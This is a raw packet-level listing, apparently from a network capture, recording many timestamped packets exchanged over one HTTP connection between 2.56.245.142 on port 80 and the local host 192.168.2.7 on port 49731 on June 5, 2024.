Jun 5, 2024 18:28:36.947514057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947529078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947599888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947611094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947622061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947664022 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947664976 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947683096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947700024 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947705030 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947712898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947722912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947734118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947738886 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947743893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947753906 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947755098 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947766066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947776079 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947786093 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947798014 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947799921 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947804928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947805882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947809935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947815895 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947854996 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947854996 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947885036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947902918 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947905064 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947906017 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947910070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947920084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947926044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947926998 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947931051 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947941065 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947948933 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.947951078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947962046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947973013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.947983980 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948003054 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948003054 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948035002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948044062 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948044062 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948045015 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948055983 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948065996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948076010 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948086023 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948096037 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948108912 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948112965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948127985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948137999 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948137999 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948149920 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948158979 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948160887 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948169947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948179960 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948189974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948200941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948204041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948204041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948214054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948224068 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948230028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948246956 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948254108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948256969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948267937 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948278904 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948280096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948290110 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948299885 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948304892 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948307037 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948309898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948312044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948324919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948329926 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948339939 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948343992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948355913 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948367119 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948380947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948388100 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948393106 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948402882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948407888 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948407888 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948409081 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948457003 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948467970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948477030 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948496103 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948496103 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948518991 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948518991 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948534012 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948546886 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948556900 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948575020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948580027 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948585033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948595047 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948595047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948606014 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948622942 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948633909 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948647976 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948647976 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948648930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948661089 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948681116 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948699951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948709965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948720932 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948729992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948738098 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948740959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948756933 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948765039 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948767900 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948780060 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948792934 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948792934 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948801041 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948822975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948824883 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948848009 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948877096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948894024 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.948899984 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948919058 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.948992014 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949002981 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949012041 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949018002 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949023008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949031115 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949039936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949055910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949065924 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949081898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949094057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949105024 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949115992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949115992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949125051 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949126959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949146032 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949167013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949182034 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949193001 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949201107 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949203014 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949249029 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949249029 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949254036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949264050 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949276924 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949316025 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949477911 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949495077 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949506044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949516058 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949527025 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949529886 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949537039 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949548006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949558020 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949558973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949569941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949583054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949594021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949604034 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949615002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949625969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949642897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949645996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949642897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949642897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949642897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949661016 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949671984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949686050 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949688911 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949688911 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949691057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949692965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949697971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949718952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949724913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949736118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949745893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949755907 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949758053 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949758053 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949765921 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949776888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949786901 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949798107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949814081 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949826956 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949826956 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949826956 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949842930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949852943 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949862957 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949867010 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949867010 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949872971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949882984 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949882984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949898958 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949908972 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949927092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949937105 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949939013 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949939013 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949947119 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949954987 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.949956894 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949971914 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949981928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.949995041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950005054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950015068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950023890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950032949 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950032949 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950033903 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950045109 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950054884 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950064898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950064898 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950074911 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950084925 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950089931 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950098038 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950107098 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950112104 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950119019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950129032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950145960 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950156927 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950166941 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950166941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950177908 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950197935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950198889 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950206995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950212955 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950218916 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950228930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950231075 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950239897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950249910 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950249910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950262070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950278997 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950283051 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950284004 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950297117 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950325966 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950337887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950349092 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950349092 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950377941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950387955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950407028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950417042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950427055 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950427055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950437069 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950454950 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950464964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950475931 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950476885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950491905 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950627089 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950644016 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950650930 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950654030 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950665951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950669050 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950670958 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950675011 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950692892 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950701952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950711012 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950712919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950722933 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950731993 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950733900 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950743914 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950745106 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950753927 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950763941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950773954 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950777054 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950793982 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950794935 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950804949 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950815916 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950815916 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950826883 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950835943 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950836897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950846910 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950848103 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950860023 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950872898 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950876951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950879097 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950885057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950902939 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950915098 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950925112 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950934887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950942993 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950949907 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950951099 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950963974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950973988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.950977087 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950987101 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.950999022 CEST	80	49731	2.56.245.142	192.168.2.7
